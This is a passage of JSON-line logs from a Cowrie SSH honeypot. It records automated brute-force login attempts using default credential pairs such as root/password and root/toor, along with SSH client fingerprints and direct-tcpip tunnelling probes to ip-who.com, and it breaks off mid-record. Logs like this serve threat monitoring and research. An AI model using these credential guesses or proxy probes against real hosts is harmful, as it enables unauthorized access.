{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":49828,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5c7e97389d3","protocol":"ssh","message":"New connection: 103.217.145.104:49828 (1.2.3.4:22) [session: d5c7e97389d3]","sensor":"my-vps","timestamp":"2025-08-26T04:08:02.015454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:08:02.016469Z","src_ip":"103.217.145.104","session":"d5c7e97389d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:08:02.025384Z","src_ip":"212.227.235.229","session":"33ef23459758"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58806,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9e0375f2c3f","protocol":"ssh","message":"New connection: 212.227.235.229:58806 (1.2.3.4:22) [session: a9e0375f2c3f]","sensor":"my-vps","timestamp":"2025-08-26T04:08:02.052367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:02.054051Z","src_ip":"212.227.235.229","session":"a9e0375f2c3f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:08:02.284598Z","src_ip":"103.217.145.104","session":"d5c7e97389d3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:02.567758Z","src_ip":"212.227.235.229","session":"a9e0375f2c3f"}
{"eventid":"cowrie.login.failed","username":"neko","password":"neko","message":"login attempt [neko/neko] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:03.212049Z","src_ip":"212.227.235.229","session":"33ef23459758"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:08:03.401761Z","src_ip":"103.217.145.104","session":"d5c7e97389d3"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:03.670598Z","src_ip":"103.217.145.104","session":"a0218faaece6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:03.671791Z","src_ip":"103.217.145.104","session":"d5c7e97389d3"}
{"eventid":"cowrie.login.success","username":"root","password":"welc0me","message":"login attempt [root/welc0me] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:08:03.673540Z","src_ip":"212.227.235.229","session":"a9e0375f2c3f"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:08:03.690336Z","src_ip":"212.227.235.229","session":"3752f83531ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:08:03.942917Z","session":"a9e0375f2c3f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:08:03.971487Z","session":"3752f83531ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:08:04.198424Z","src_ip":"212.227.235.229","session":"a9e0375f2c3f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:08:04.397190Z","src_ip":"212.227.235.229","session":"3752f83531ae"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:04.499681Z","src_ip":"212.227.235.229","session":"33ef23459758"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:04.517482Z","src_ip":"212.227.235.229","session":"a9e0375f2c3f"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:04.827349Z","src_ip":"212.227.235.229","session":"3752f83531ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58808,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9e3a1a4b30f","protocol":"ssh","message":"New connection: 212.227.235.229:58808 (1.2.3.4:22) [session: d9e3a1a4b30f]","sensor":"my-vps","timestamp":"2025-08-26T04:08:07.368982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:07.522383Z","src_ip":"212.227.235.229","session":"d9e3a1a4b30f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:07.660474Z","src_ip":"212.227.235.229","session":"d9e3a1a4b30f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56252,"dst_ip":"1.2.3.4","dst_port":22,"session":"4437e7d684b4","protocol":"ssh","message":"New connection: 212.227.235.229:56252 (1.2.3.4:22) [session: 4437e7d684b4]","sensor":"my-vps","timestamp":"2025-08-26T04:08:09.173392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:09.204899Z","src_ip":"212.227.235.229","session":"4437e7d684b4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:09.455200Z","src_ip":"212.227.235.229","session":"4437e7d684b4"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:08:10.288285Z","src_ip":"212.227.235.229","session":"d9e3a1a4b30f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:08:12.507628Z","session":"d9e3a1a4b30f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:08:12.794584Z","src_ip":"212.227.235.229","session":"d9e3a1a4b30f"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:13.112990Z","src_ip":"212.227.235.229","session":"d9e3a1a4b30f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"abc123","message":"login attempt [admin/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:20.179113Z","src_ip":"212.227.235.229","session":"4437e7d684b4"}
{"eventid":"cowrie.session.closed","duration":"12.3","message":"Connection lost after 12.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:21.495616Z","src_ip":"212.227.235.229","session":"4437e7d684b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51212,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9325158fc18","protocol":"ssh","message":"New connection: 212.227.235.229:51212 (1.2.3.4:22) [session: a9325158fc18]","sensor":"my-vps","timestamp":"2025-08-26T04:08:21.871782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:22.444055Z","src_ip":"212.227.235.229","session":"a9325158fc18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53350,"dst_ip":"1.2.3.4","dst_port":22,"session":"040a89cff033","protocol":"ssh","message":"New connection: 212.227.235.229:53350 (1.2.3.4:22) [session: 040a89cff033]","sensor":"my-vps","timestamp":"2025-08-26T04:08:22.525388Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:22.543675Z","src_ip":"212.227.235.229","session":"a9325158fc18"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:22.576945Z","src_ip":"212.227.235.229","session":"040a89cff033"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51238,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba2e480a30fe","protocol":"ssh","message":"New connection: 212.227.235.229:51238 (1.2.3.4:22) [session: ba2e480a30fe]","sensor":"my-vps","timestamp":"2025-08-26T04:08:23.229447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:23.354329Z","src_ip":"212.227.235.229","session":"ba2e480a30fe"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1",